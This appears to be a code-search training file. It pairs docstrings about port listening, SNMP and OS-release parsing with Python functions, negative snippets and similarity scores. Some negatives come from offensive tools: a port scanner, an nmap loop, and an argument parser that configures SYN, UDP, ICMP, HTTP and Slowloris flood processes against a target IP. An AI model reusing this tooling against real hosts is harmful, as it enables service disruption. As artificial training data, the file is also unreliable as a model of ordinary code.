for etriggers')", "def listening_for(message):\n\n if Utilities.isNotEmpty(message['text']):\n cmds = ['!whois', '!geoloc', '!ping']\n return message['text'].split()[0] in cmds", "def check_port(self):\r\n\t\treturn(self.connect.is_open)", "def wantsReadEvent(self):\r\n if self.result != None:\r\n return self.result == 0\r\n return None", "def handle(self, event):\n try:\n for event_listeners in self.listeners[event.type]:\n if event_listeners:\n for listener in event_listeners:\n if listener(event) is False:\n return False\n except KeyError:\n logger.insane('No listeners defined for event \"%s\"', hr_event_type(event.type))\n pass\n\n return True", "def listener(self, aaidee=0):\n return Listener(self._ptr, aaidee)", "def is_subscriber(self) -> bool:\n return self.subscriber", "def listen(address, port, community, mibs):\n snmp.listen(address, port, community, snmp.DEFAULT_MIBS + mibs)\n return 0", "def MulticastLoopback(self) -> bool:" ]
[ "0.66875106", "0.65970385", "0.6574591", "0.65360075", "0.6319728", "0.6317834", "0.6192521", "0.61528975", "0.6120801", "0.6109273", "0.60723865", "0.6063828", "0.60545415", "0.6010599", "0.5838284", "0.58022517", "0.5795148", "0.5793659", "0.57519114", "0.57032394", "0.5682425", "0.5673269", "0.5670093", "0.5619184", "0.5606707", "0.56055", "0.55855995", "0.5571002", "0.5562174", "0.5497071" ]
0.66736966
1
Process runtime args. Based on the args, run the program. Return the number of listeners for all provided ports. 100 == error for port
def main(): import getopt try: options, remainder = getopt.getopt( sys.argv[1:], '', ['help', # Print usage msg, exit 'short', # Output is shortened 'pid', # Output only pid of listenig process 'proc', # Output only process name of listening port 'kill', # Kill the process give its port ] ) except getopt.GetoptError as err: sys.stderr.write(str(err) + '\n') usage(1) shortened = False pid_only = False proc_only = False kill = False for opt, arg in options: if opt in ['--help']: usage(0) elif opt in ['--short']: shortened = True elif opt in ['--pid']: pid_only = True elif opt in ['--proc']: proc_only = True elif opt in ['--kill']: kill = True else: # Should never happen. getopt() will catch this. sys.stderr.write('Unhandled option:"%s"\n' % opt) usage(1) try: if len(remainder): for aport in remainder: int(aport) # Insist on a valid integer. else: remainder = [] remainder.append(PORT) except ValueError as err: sys.stderr.write('port number must be all numeric:%s\n' % str(remainder)) return 255 ret_code = 0 for aport in remainder: status = listening(aport, shortened, pid_only, proc_only, kill) if status == 255: return 255 # Illegal option ret_code += status return ret_code
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def portcheck_main(args=sys.argv[1:]):\n ports = portcheck(*args)\n for i in ports:\n print '%s: %s' % (i, ports[i])\n return 0", "def run_app():\n target = None\n negative_results = False\n\n description = 'Simple TCP port scanner'\n epilog = 'The author of this code take no responsibility for your use or misuse'\n parser = argparse.ArgumentParser(prog='TCPPortScan.py', description=description, epilog=epilog)\n parser.add_argument(\"target\", help=\"Your target to scan\")\n parser.add_argument('-p', '--port', help=\"Set a single port\", default=22, type=int)\n parser.add_argument('-r', '--range', help=\"Set a port range (eq 22-80)\")\n parser.add_argument(\"--all\", help=\"Show negative results (closed ports)\", action=\"store_true\")\n args = parser.parse_args()\n\n if len(args.target) < 1:\n print('You did not provide any target?')\n exit(1)\n else:\n target = args.target\n\n if args.all:\n negative_results = True\n\n if args.range:\n print(\"Start scanning ports {} on target {}\".format(args.range, target))\n range_list = args.range.split('-')\n for element in range(int(range_list[0]), int(range_list[1]) + 1):\n port_scan(target, element, negative_results)\n else:\n print(\"Start scanning port {} on target {}\".format(args.port, target))\n port_scan(target, args.port, negative_results)", "def usage(exit_code):\n\n sys.stderr.write(\"\"\"\n List the processes that are listening to a port.\n Defaults to ZeroMQ port of 5570.\n\n Use by:\n listeningPort [--help] [--short | --pid | --proc] [--kill] \\\n <port0> [<port1> ...]\n e.g.:\n listeningPort 5570 # The ZeroMQ default port\n listeningPort 5570 5571 5572 # Multiple ports may be checked\n listeningPort --short 5570\n listeningPort $(seq 5570 5580) # Ports 5570 through 5580 inclusive.\n\n For the case of a free port, output similar to:\n Port 5571 : Nobody listening\n\n --help = this message\n\n Only one of the following can be supplied:\n --short = Output consists of only three space separated fields:\n <port> <pid of listener> <process name of listener>\n Ports with nobody listening gets ignored for output.\n --pid = Output consists only of a pid\n --proc = Output consists only of process names\n --kill = Any ports with a listener will be killed with \"kill -9 <pid>\"\n\n Return codes:\n 255 == Invalid command line.\n 0 == Nobody listening to <port>\n > 0 == The number of ports someone is listening to.\n For a series of port, this value is the number\n of ports with a listener.\n For a single port, this will be 1 is someone\n is listening.\n \\n\n ***NOTICE***: This routine does NOT work on OSX!\n Replace this with:\n lsof -i<port> | awk '{ print $2; }' | head -2\n PID\n 18101\n This prints only the pid of the process using this port.\n Now use \"ps\" to find the process:\n ps ax | grep 18191 | grep -v grep\n 10191 s001 S+ 0:00.00 /usr/bin/python /usr/local/bin/logCollector\n \"\"\")\n sys.exit(exit_code)", "def cmd_port(args):", "def main(argv):\n # Our command line is trivial so I avoid an argparse import. If we ever\n # grow more than 1-2 args, switch to a using argparse.\n if '-h' in argv or '--help' in argv:\n print(argv[0], 'usage:\\n')\n import inspect\n print(inspect.getdoc(main))\n sys.exit(1)\n pid=int(argv[1]) if len(argv) > 1 else os.getppid()\n bind_timeout=float(argv[2]) if len(argv) > 2 else 0\n port = _pick_unused_port(pid=pid, noserver_bind_timeout=bind_timeout)\n if not port:\n sys.exit(1)\n print(port)", "def main(args):\n if '-' in args['-p']:\n tmp = args['-p'].split('-')\n tgtPorts = [str(i) for i in xrange(int(tmp[0]), int(tmp[1])+1)]\n else:\n tgtPorts = [args['-p']]\n tgtHost = args['-H']\n for tgtPort in tgtPorts:\n nmapScan(tgtHost, tgtPort)", "def main():\n\n # TODO: more advanced argument processing\n\n # Handle port\n port = None\n if len(sys.argv) > 1:\n port_arg = sys.argv[1]\n try:\n port = int(port_arg[1:] if port_arg.startswith(':') else port_arg)\n except:\n pass\n\n try:\n serve(port=port)\n except ValueError, ex:\n # Show input error\n print 'Error:', ex", "def main(cls, args=None):\n parser = cls.CreateParser()\n cls.AddCommandLineArgs(parser, None)\n options, extra_args = parser.parse_known_args(args=args)\n cls.ProcessCommandLineArgs(parser, options, extra_args, None)\n return min(cls().Run(options, extra_args), 255)", "def portkill_main(args=sys.argv[1:]):\n # Probably should use optparse or some such.\n kw = {}\n if '-v' in args:\n kw['verbose'] = True\n args = [a for a in args if a != '-v']\n if '-s' in args:\n index = args.index('-s')\n kw['sleeptime'] = args[index + 1]\n args = args[:index] + args[index+2:]\n portkill(*args, **kw)\n return 0", "def main(\n args: Sequence[str] = sys.argv[1:],\n) -> None:\n options = argument_parser().parse_args(args)\n\n valid_passports = 0\n\n for record in parse_passport_records(options.source):\n if options.verbose:\n print(record, file=sys.stderr)\n try:\n validate_passport(record, permissive=options.permissive)\n except ValueError as exc:\n if options.verbose:\n print(str(exc), file=sys.stderr)\n else:\n valid_passports += 1\n\n print(valid_passports)", "def main():\n\n if (len(sys.argv) < 3):\n print 'Usage: python serverclient.py <server|client> <port>\\n'\n return -1\n else:\n if sys.argv[1].lower() == 'server':\n Server(sys.argv[2])\n elif sys.argv[1].lower() == 'client':\n Client(sys.argv[2])\n else:\n print 'Unrecognized argument: ', sys.argv[1]\n return -1\n return 0", "def main():\n if len(sys.argv) != 2:\n sys.exit(\"Usage: python server-python.py [Server Port]\")\n server_port = int(sys.argv[1])\n server(server_port)", "def main():\n if len(sys.argv) != 2:\n sys.exit(\"Usage: python server-python.py [Server Port]\")\n server_port = int(sys.argv[1])\n server(server_port)", "def get_sshuttle_args_count(proc_name):\n procs = subprocess.check_output(['ps', '-eo', 'comm,args']).splitlines()\n name_procs = [proc for proc in procs if proc_name.encode() in proc]\n\n if len(name_procs) > 1:\n return -1\n elif len(name_procs) == 0:\n return 0\n else:\n nets = re.split('\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/\\d{1,3}', name_procs[0])\n return len(nets)-1", "def main():\n lgs = LifeGenServer()\n lgs.listening()", "def listening(port,\n shortened=False,\n pid_only=False,\n proc_only=False,\n kill=False):\n if platform.system() not in ['Darwin', 'Linux']:\n sys.stderr.write('listeningPort available only under Linux and Darwin!\\n')\n sys.exit(-1)\n\n fuser = find_executable('fuser')\n if fuser == None:\n print('Cannot find \"fuser\". Exiting.')\n sys.exit(1)\n proc = subprocess.Popen('%s %s/tcp' % (fuser, str(port)),\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n line = proc.stdout.readline()\n #print('fuserline:%s' % line)\n subproc_items = line.split()\n if len(subproc_items) == 0:\n if shortened is False:\n sys.stdout.write('Port %s : Nobody listening\\n' %\n str(port))\n return 0\n pid = subproc_items[-1]\n proc.wait()\n\n # \"pid\" now has the PID of the process listening to the port.\n # Map that to a process name.\n # procName = subprocess.Popen('ps x %s' % pid, shell=True,\n out, err = subprocess.Popen('/usr/bin/ps x | /usr/bin/grep %s' % pid,\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT).communicate()\n if err and len(err):\n sys.stderr.write(err + '\\n')\n for line in out.splitlines():\n items = line.split()\n if (len(items) > 0) and (items[0] != pid): \n # Ignore all but requested pid\n continue\n\n # Kill the process if requested.\n if kill:\n print('killing pid %d' % pid)\n p = psutil.Process(int(pid))\n p.terminate() # Kill the process.\n return 1\n\n # Branch on requested output\n if shortened:\n sys.stdout.write('%s %s %s\\n' % (str(port),\n pid, ' '.join(items[5:])))\n elif pid_only:\n sys.stdout.write('%s\\n' % pid)\n elif proc_only:\n sys.stdout.write('%s\\n' % ' '.join(items[4:]))\n else:\n sys.stdout.write('Port %s : listening thru pid %s %s\\n' %\n (str(port), pid, ' '.join(items[5:])))\n return 1\n\n return 0", "def main():\n args = parse_args()\n process_args(args)", "def analyze_local_server_binary_get_ports(target_binary, target_platform):\n log(\"warning: this will run the binary on your local machine, this could put you at risk\")\n detect_ports = prompt_yn(\"magically detect ports?\")\n port = -1\n if detect_ports:\n try:\n # start the server\n log(\"starting the binary\")\n if target_platform == PLATFORM_WINDOWS:\n log(\"using wine\")\n server_instance = subprocess.Popen([\"wine\", target_binary], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n else:\n log(\"running binary\")\n server_instance = subprocess.Popen([target_binary], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n # give it time to start up\n log(\"allowing time to start\")\n time.sleep(LOAD_TIME)\n\n # grab netstat results\n netstat_results = subprocess.check_output([\"netstat\", \"-lnpt\"], stderr=subprocess.PIPE).decode(\"utf-8\")\n\n # ignore anything without pid of the server or the \"LISTEN\" status\n netstat_results = [line for line in netstat_results.splitlines() if str(server_instance.pid) in line and \"LISTEN\" in line]\n\n # extract port numbers\n ports = [int(re.search(r\":\\d+\", line).group(0).strip(\":\")) for line in netstat_results]\n \n # select port numbers\n if len(ports) > 1:\n port = prompt_list(\"select a port to target\", ports)\n elif len(ports) == 1:\n port = ports[0]\n else:\n log(\"unable to detect port\")\n except:\n log(\"failed to magically get the port\")\n finally:\n # clean up\n log(\"killing the server\")\n server_instance.kill()\n\n # check if valid port detected\n if not (1 <= port <= 65535):\n # prompt the user for a port if not\n port = prompt_number(\"target port?\")\n\n log(f\"target port {port}\")\n return port", "def run(self, port_update_args, network_create_args=None,\n port_create_args=None, ports_per_network=1):\n network = self._get_or_create_network(**(network_create_args or {}))\n for i in range(ports_per_network):\n port = self.neutron.create_port(\n network[\"id\"], **(port_create_args or {}))\n self.neutron.update_port(port[\"id\"], **port_update_args)", "def listen_fds(unset_environment=True):\n fds = int(os.environ.get('LISTEN_FDS', 0))\n listen_pid = int(os.environ.get('LISTEN_PID', 0))\n\n if listen_pid != os.getpid():\n return 0\n\n if unset_environment:\n os.environ.pop('LISTEN_PID', None)\n os.environ.pop('LISTEN_FDS', None)\n\n return fds", "def initialize_and_run(self, port, host=''):\n port = int(port)\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((host, port))\n while True:\n self.sock.listen(5) # TODO: make this configurable\n conn, addr = self.sock.accept()\n raw_command = conn.recv(1024)\n splitted = raw_command.split()\n if splitted:\n command, args = splitted[0], splitted[1:]\n else:\n command, args = b'', b''\n command = command.decode()\n args = [x.decode() for x in args]\n\n try:\n result = self.handler(command, args)\n except Exception:\n logger.info(traceback.format_exc())\n # kill all the child processes\n self.handle_killall()\n result = 'Error occured. Please check log at /tmp/assistant.log.' # noqa\n\n out = '{}\\n'.format(result)\n conn.send(try_encode(out))\n conn.close()", "def main():\n return run_server(**parse_server_args())", "def get_port_counts(ssh):\r\n cmd02='netstat -na'\r\n retry_number=3\r\n try:\r\n while True:\r\n if retry_number == 0:\r\n logger.writeLog(\"get port counts fail\",level='error')\r\n break\r\n stdin,stdout,stderr=ssh.exec_command(cmd02)\r\n data02=(stdout.read().decode('gbk').strip().replace(' ','').replace('\\t','').replace('\\r','').replace('\\n',''))\r\n print(data02)\r\n if data02 == \"\":\r\n retry_number -= 1\r\n logger.writeLog(\"port counts data is null\",level='error')\r\n continue\r\n else:\r\n pattern=re.compile('1.*?:22',re.S)\r\n match_list=re.findall(pattern,data02)\r\n print(match_list)\r\n port_count=len(match_list)\r\n logger.writeLog(\"get port counts success\",level='info')\r\n print(\"port connected counts:\",port_count)\r\n return port_count\r\n break\r\n except:\r\n logger.writeLog(\"get port counts error\",level='error')\r\n return None", "def detect_used_ports():\n MAX_PORT = 1025\n DEFAULT_HOST = '127.0.0.1'\n open_ports = []\n socket.setdefaulttimeout(1)\n for port in range(0, MAX_PORT):\n res = port_scan(DEFAULT_HOST, port)\n if res:\n open_ports.append(port)\n # debugging purpose to see if program is running\n if port % 5000 == 0 and port != 0:\n sys.stderr.write('.')\n return open_ports", "def set_arguments(parser):\n args = parser.parse_args()\n\n if not args.ip:\n parser.print_help()\n show_error(\"The IP address of web server is required\")\n\n if not args.udp and not args.syn and not args.fudp and not args.ipsec and not args.icmp and not args.ficmp and not args.http and not args.slow:\n parser.print_help()\n show_error(\"At least one type of attack is required\")\n\n if args.port:\n if args.port > 0 and args.port <= 65535:\n global destination_port\n destination_port = args.port\n else:\n parser.print_help()\n show_error(\"Wrong port number\")\n\n if (args.udp or args.syn or args.fudp or args.ipsec or args.slow or args.http) and not args.port:\n parser.print_help()\n show_error(\"Port number for IPSEC, UDP, TCP, HTTP, protocols is required\")\n\n if (args.icmp or args.ficmp) and args.port and (not args.udp and not args.syn and not args.fudp and not args.ipsec and not args.http and not args.slow):\n print(\"WARNING: port number only for UDP, TCP, IPSEC protocols is required.\")\n time.sleep(3)\n\n if args.icmp:\n if args.icmp > 0 and args.icmp <= 300:\n global processes_icmp\n processes_icmp = args.icmp\n else:\n parser.print_help()\n show_error(\"Wrong processes count\") \n\n if args.ficmp:\n if args.ficmp > 0 and args.ficmp <= 300:\n global processes_ficmp\n processes_ficmp = args.ficmp\n else:\n parser.print_help()\n show_error(\"Wrong processes count\")\n\n if args.ipsec:\n if args.ipsec > 0 and args.ipsec <= 300:\n global processes_ipsec\n processes_ipsec = args.ipsec\n else:\n parser.print_help()\n show_error(\"Wrong processes count\")\n\n if args.syn:\n if args.syn > 0 and args.syn <= 300:\n global processes_syn\n processes_syn = args.syn\n else:\n parser.print_help()\n show_error(\"Wrong processes count 100\")\n\n if args.udp:\n if args.udp > 0 and args.udp <= 300:\n global processes_udp\n processes_udp = args.udp\n else:\n parser.print_help()\n show_error(\"Wrong processes count 100\")\n\n if args.fudp:\n if args.fudp > 0 and args.fudp <= 300:\n global processes_fudp\n processes_fudp = args.fudp\n else:\n parser.print_help()\n show_error(\"Wrong processes count\")\n\n if args.http:\n if args.http > 0 and args.http <= 300:\n global processes_http\n processes_http = args.http\n else:\n parser.print_help()\n show_error(\"Wrong processes count\")\n\n if args.slow:\n if args.slow > 0 and args.slow <= 300:\n if not args.sockets:\n parser.print_help()\n show_error(\"Sockets count is required\")\n if args.sockets >= 1 and args.sockets <= 1000:\n global socket_count\n socket_count = args.sockets\n else:\n parser.print_help()\n show_error(\"Wrong sockets count\")\n\n global processes_slowloris\n processes_slowloris = args.slow\n else:\n parser.print_help()\n show_error(\"Wrong processes count\")\n\n if not args.slow and args.sockets:\n print(\"WARNING: sockets only for Slowloris are required.\")\n time.sleep(3)\n\n global destination_ip\n destination_ip = args.ip", "def parse_args():\n if len(sys.argv) < REQUIRED_NUM_ARGS or len(sys.argv) > MAXIMUM_NUM_ARGS:\n error_quit(\"Incorrect number of arguments!\", 400)\n # Set port to DEFAULT if not specified as an arg. Otherwise, port = portarg.\n port = sys.argv[PORT_ARG_NUM] if len(sys.argv) == MAXIMUM_NUM_ARGS else DEFAULT_FTP_PORT\n port = validate_port(port)\n # Get host address and logfile name from args.\n host, log_file = sys.argv[HOST_ARG_NUM], sys.argv[LOG_ARG_NUM]\n return host, log_file, port", "def main(args):\n\n args = parse_args(args)\n setup_logging(args.loglevel)\n \n app.run(port='5002')", "def listen(address, port, community, mibs):\n snmp.listen(address, port, community, snmp.DEFAULT_MIBS + mibs)\n return 0", "def main():\n parser = create_arg_parser()\n\n # If script run without arguments, print syntax\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n # Parse arguments\n args = parser.parse_args()\n host = args.h\n mode = args.m\n port = args.p\n debug_mode = args.debug\n\n # Run server with user-given arguments\n run_server(host, port, mode, debug_mode)", "def run():\n _input = sys.stdin\n count = count_by_code(_input, 404)\n print(count)" ]
[ "0.6942394", "0.66215736", "0.63740706", "0.62902844", "0.60026693", "0.5923105", "0.58010936", "0.57660186", "0.5717203", "0.56580085", "0.5623557", "0.55659944", "0.55659944", "0.55630726", "0.5499098", "0.5495286", "0.54854834", "0.5462336", "0.54213244", "0.5405209", "0.53990555", "0.53937405", "0.53921616", "0.53828424", "0.53809136", "0.5370043", "0.53672826", "0.5355639", "0.53555673", "0.52980787" ]
0.7322132
0
Testing opssysd correctly stores switch_version column. Test if the opssysd correctly parse the osrelease file and stores the information in the OVSDB.
def check_switch_version(dut, file_name): copy_os_release_file(dut, file_name) # Restart the ovsdb-server and sysd start(dut) version_id = read_os_release_file(dut, file_name, 'VERSION_ID') build_id = read_os_release_file(dut, file_name, 'BUILD_ID') expected = "{0} (Build: {1})".format(version_id, build_id) result = get_switch_version(dut) assert result == expected
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_update_hyperflex_server_firmware_version(self):\n pass", "def init_linuxVersion(self):\n releaseDic = collections.OrderedDict() # 排序的字典\n releaseDic['/etc/oracle-release'] = self.__getOracleVersion\n releaseDic['/etc/redhat-release'] = self.__getRedhatVersion\n releaseDic['/etc/debian_version'] = self.__getDebianVersion\n releaseDic['/etc/SuSE-release'] = self.__getSuSEVersion\n # for releaseFilePath in releaseDic.keys():\n # print(releaseFilePath)\n #\n # releaseDic = {'/etc/oracle-release': self.__getOracleVersion,\n # '/etc/redhat-release': self.__getRedhatVersion,\n # '/etc/debian_version': self.__getDebianVersion,\n # '/etc/SuSE-release': self.__getSuSEVersion}\n for releaseFilePath in releaseDic.keys():\n ret, resultErr = self.ksp_ssh.ssh_execute_command(\n '[[ -f %s ]] && echo \"exist\" || echo \"not exist\"' % releaseFilePath)\n if 'not' in ret:\n continue\n else:\n return releaseDic.get(releaseFilePath, self.__getNullVersion)()\n return \"unknownVendor\", \"unknownRelease\"", "def test_os_release(self):\n self.assertEqual(self.settings.OS_RELEASE, platform.release())", "def _init_obo_version(self, line):\n if line[0:14] == \"format-version\":\n self.format_version = line[16:-1]\n if line[0:12] == \"data-version\":\n self.data_version = line[14:-1]", "def test_patch_hyperflex_server_firmware_version(self):\n pass", "def test_update_hyperflex_hxdp_version(self):\n pass", "def __getSuSEVersion(self):\n linuxVendor = \"SuSE\"\n linuxRelease, resultErr = self.ksp_ssh.ssh_execute_command(\n \"grep 'VERSION' /etc/SuSE-release | cut -d= -f2 | tr -d ' \\n'\")\n return linuxVendor.strip(), linuxRelease.strip()", "def test_parse_version(self):\n self.assertEqual(\n _parse_sw_version('BaiStation_V100R001C00B110SPC003'),\n [100, 1, 0, 110, 3],\n )\n self.assertEqual(\n _parse_sw_version('BaiStation_V100R001C00B060SPC012'),\n [100, 1, 0, 60, 12],\n )\n self.assertEqual(\n _parse_sw_version('BaiStation_V100R001C00B060SPC012_FB_3'),\n [100, 1, 0, 60, 12],\n )\n # Incorrect number of digits\n self.assertEqual(\n _parse_sw_version('BaiStation_V10R001C00B060SPC012'),\n None,\n )\n self.assertEqual(\n _parse_sw_version('XYZ123'),\n None,\n )\n self.assertEqual(\n _parse_sw_version(''),\n None,\n )", "def __getOracleVersion(self):\n linuxVendor = \"Oracle\"\n linuxRelease, resultErr = self.ksp_ssh.ssh_execute_command(\n \"cat /etc/oracle-release | sed 's/^Oracle Linux Server release /OL/' | sed 's/[ .].*//' \") # El8\n return linuxVendor.strip(), linuxRelease.strip() # strip()删除开头结尾的空格", "def test_update_hyperflex_software_version_policy(self):\n pass", "def test_SSLeay_version(self):\n versions = {}\n for t in [\n SSLEAY_VERSION,\n SSLEAY_CFLAGS,\n SSLEAY_BUILT_ON,\n SSLEAY_PLATFORM,\n SSLEAY_DIR,\n ]:\n version = SSLeay_version(t)\n versions[version] = t\n assert isinstance(version, bytes)\n assert len(versions) == 5", "def _extract_nos_version(self, data: str) -> None:\n if self.devtype == \"linux\":\n for line in data.splitlines():\n if line.startswith(\"VERSION_ID\"):\n self.version = line.split('=')[1] \\\n .strip().replace('\"', '')\n break\n else:\n self.version = \"all\"\n self.logger.error(\n f'Cannot parse version from {self.address}:{self.port}')", "def testStratisVersion(self):\n version = Manager.Properties.Version.Get(get_object(TOP_OBJECT))\n (major, _, _) = version.split(\".\")\n self.assertEqual(major, \"0\")", "def test_version(self):\n config = {\"sensor\": {\"platform\": \"version\", \"name\": \"test\"}}\n\n with patch(\"openpeerpower.const.__version__\", MOCK_VERSION):\n assert setup_component(self.opp, \"sensor\", config)\n self.opp.block_till_done()\n\n state = self.opp.states.get(\"sensor.test\")\n\n assert state.state == \"10.0\"", "def test_create_hyperflex_server_firmware_version(self):\n pass", "def test_release_version():\n pkg_vars = {}\n with open(VERSION_FILE) as f:\n exec(f.read(), pkg_vars) # nosec\n project_version = pkg_vars[\"__version__\"]\n assert (\n RELEASE_TAG == f\"v{project_version}\"\n ), \"RELEASE_TAG does not match the project version\"", "def test_versionInfo(self):\n self.assertEqual(\n nevow.__version_info__,\n (nevow.version.major, nevow.version.minor, nevow.version.micro))", "def test_update_pci_switch(self):\n pass", "def test_version(self):\n v = version('/no/such/executable')\n self.assertEqual(v, '0.0.1.dev0')\n v = version('false')\n self.assertEqual(v, '0.0.1.dev0')\n v = version('echo')\n self.assertEqual(v, 'describe .devrev-list --count HEAD')", "def test_get_version(self):\n pass", "def check_os_version():\n if not version.is_supported_version():\n supported_releases = []\n for rel in version.SUPPORTED_VERSIONS:\n for ver in version.SUPPORTED_VERSIONS[rel]:\n supported_releases.append(rel.upper() + ' ' + ver)\n reporting.create_report([\n reporting.Title(\n 'The installed OS version is not supported for the in-place upgrade to the target RHEL version'\n ),\n reporting.Summary(\n 'The supported OS releases for the upgrade process:\\n'\n ' {}'.format('\\n'.join(supported_releases))\n ),\n reporting.Severity(reporting.Severity.HIGH),\n reporting.Groups(COMMON_REPORT_TAGS),\n reporting.Groups([reporting.Groups.INHIBITOR]),\n # we want to set a static Key here because of different Title per path\n reporting.Key('1c7a98849a747ec9890f04bf4321de7280970715')\n ] + related)", "def test_firmware_version(self):\n self._verify_firmware_version()", "def get_required_ovs_version(self):\n return self.get_required_version(\"Open vSwitch\", self.openshift_to_ovs_version)", "def test_save_tsc_old_version(uvm_nano):\n uvm_nano.start()\n uvm_nano.snapshot_full(target_version=\"0.24.0\")\n uvm_nano.check_log_message(\"Saving to older snapshot version, TSC freq\")", "def test_command_edit_info_version_1_to_2():\n with tempfile.NamedTemporaryFile() as tmp:\n shutil.copy(kValid1, tmp.name)\n\n wozardry.parse_args([\"edit\", \"-i\", \"version:2\", tmp.name])\n with open(tmp.name, \"rb\") as tmpstream:\n woz = wozardry.WozDiskImage(tmpstream)\n assert woz.image_type == wozardry.kWOZ2\n assert woz.info[\"version\"] == 2\n assert woz.info[\"boot_sector_format\"] == 0\n assert woz.info[\"optimal_bit_timing\"] == 32\n assert woz.info[\"compatible_hardware\"] == []\n assert woz.info[\"required_ram\"] == 0", "def test_smc_version_value(self):\n \n smc_version = get_smc_version()\n \n # Check to make sure the smc_version is '2.15f7'\n self.assertEqual(smc_version, '2.15f7')", "def check_openmanage_version():\n try:\n # Because of\n # https://github.com/rcbops/rcbops-maas/issues/82#issuecomment-52315709\n # we need to redirect sdterr to stdout just so MaaS does not see any\n # extra output\n output = subprocess.check_output(['/opt/dell/srvadmin/bin/omconfig',\n 'about'],\n stderr=subprocess.STDOUT).decode('UTF-8')\n except OSError:\n # OSError happens when subprocess cannot find the executable to run\n status_err('The OpenManage tools do not appear to be installed.',\n m_name='maas_hwvendor')\n except subprocess.CalledProcessError as e:\n status_err(str(e), m_name='maas_hwvendor')\n\n match = re.search(OM_PATTERN % {'field': 'Version',\n 'group_pattern': '[0-9.]+'},\n output)\n if not match:\n status_err('Could not find the version information',\n m_name='maas_hwvendor')\n\n version = match.groups()[0]\n if version not in SUPPORTED_VERSIONS:\n status_err(\n 'Expected version in %s to be installed but found %s'\n % (SUPPORTED_VERSIONS, version),\n m_name='maas_hwvendor'\n )", "def test_version_sensor(self):\n config = {\"sensor\": {\"platform\": \"version\"}}\n\n assert setup_component(self.opp, \"sensor\", config)", "def test_version(self):\n result = check_output([b\"flocker-changestate\"] + [b\"--version\"])\n self.assertEqual(result, b\"%s\\n\" % (__version__,))", "def _collect_sonic_os_and_platform_info(duthost, request):\n logger.info(\"Getting SONiC OS version and Testbed platform info.\")\n\n out = duthost.shell(\"cd {0} && show version\".format(DUT_WORKING_DIR))\n _parse_info(out['stdout'], request.config.option.sai_test_report_dir)" ]
[ "0.59922117", "0.58298945", "0.5813068", "0.5752418", "0.57282406", "0.5699847", "0.56906575", "0.56672615", "0.56032926", "0.5582374", "0.55770415", "0.5560227", "0.5493755", "0.5482867", "0.5482622", "0.54738504", "0.5470605", "0.5469388", "0.5446355", "0.54303396", "0.5381754", "0.53696454", "0.53587615", "0.53510725", "0.53397375", "0.5316838", "0.5314408", "0.5308705", "0.53069884", "0.5296518" ]
0.6845919
0
Read the local osrelease file and return the data.
def read_os_release_file(dut, fname=default_os_release_file, key=None): cur_dir, f = os.path.split(__file__) path = os.path.join(cur_dir, os_release_files_dir, fname) d = {} with open(path) as f: for line in f: k, v = line.rstrip().split("=") d[k] = v if key: return d[key] else: return d
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def read_release_version():\n with open(\"RELEASE-VERSION\", \"r\") as f:\n return f.readline().strip()", "def versionRead():\n xuvtop = os.environ['XUVTOP']\n vFileName = os.path.join(xuvtop, 'VERSION')\n vFile = open(vFileName)\n versionStr = vFile.readline()\n vFile.close()\n return versionStr.strip()", "def get_os_release(path):\n try:\n with open(path) as f:\n data = dict(l.strip().split('=', 1) for l in f.readlines() if '=' in l)\n return OSRelease(\n release_id=data.get('ID', '').strip('\"'),\n name=data.get('NAME', '').strip('\"'),\n pretty_name=data.get('PRETTY_NAME', '').strip('\"'),\n version=data.get('VERSION', '').strip('\"'),\n version_id=data.get('VERSION_ID', '').strip('\"'),\n variant=data.get('VARIANT', '').strip('\"') or None,\n variant_id=data.get('VARIANT_ID', '').strip('\"') or None\n )\n except IOError as e:\n raise StopActorExecutionError(\n message='Cannot collect the system OS facts.',\n details={'details': str(e)}\n )", "def get_os_release(path):\n try:\n with open(path) as f:\n data = dict(l.strip().split('=', 1) for l in f.readlines() if '=' in l)\n return OSRelease(\n release_id=data.get('ID', '').strip('\"'),\n name=data.get('NAME', '').strip('\"'),\n pretty_name=data.get('PRETTY_NAME', '').strip('\"'),\n version=data.get('VERSION', '').strip('\"'),\n version_id=data.get('VERSION_ID', '').strip('\"'),\n variant=data.get('VARIANT', '').strip('\"') or None,\n variant_id=data.get('VARIANT_ID', '').strip('\"') or None\n )\n except IOError as e:\n reporting.report_generic(\n title='Error while collecting system OS facts',\n summary=str(e),\n severity='high',\n flags=['inhibitor'])\n return None", "def extract_release_data(self):\r\n data = None\r\n session = self.get_session()\r\n project = session.create(self._config.name)\r\n \r\n session.home = self._config['dir']\r\n \r\n result = self.__find_project(project)\r\n if (result != None) and (self._config.get_boolean('releasable', False)):\r\n if 'baseline.release' in self._config:\r\n data = {}\r\n _logger.info(\"Releasing: '%s'\" % result)\r\n data['name'] = result.objectname\r\n data['database'] = session.database()\r\n data['role'] = ccm.get_role_for_purpose(session, str(self._config['purpose']))\r\n data['dir'] = os.path.normpath(self._config['dir'])\r\n data['pst'] = result.name\r\n data['release'] = self._config['baseline.release']\r\n else:\r\n _logger.warning(\"Could not release \" + result.objectname + \" because the 'baseline.release' property is missing.\")\r\n return data", "def read_inventory_file():\n try:\n with open('inventory', 'r') as file:\n inventory = file.read()\n return inventory\n except OSError:\n pass", "def extract_release_data(self):\r\n data = None\r\n session = self.get_session()\r\n project = session.create(self._config.name)\r\n \r\n session.home = self._config['dir']\r\n \r\n if self._config.get_boolean('releasable', False):\r\n if 'baseline.release' in self._config:\r\n data = {}\r\n _logger.info(\"Releasing: '%s'\" % project)\r\n data['name'] = project.objectname\r\n data['database'] = session.database()\r\n data['role'] = ccm.get_role_for_purpose(session, str(self._config['purpose']))\r\n data['dir'] = os.path.normpath(self._config['dir'])\r\n data['pst'] = project.name\r\n data['release'] = self._config['baseline.release']\r\n else:\r\n _logger.warning(\"Could not release \" + project + \" because the 'baseline.release' property is missing.\")\r\n return data", "def read_file(self, currentIndex):\n handle = open(\"Program Files\\\\\" 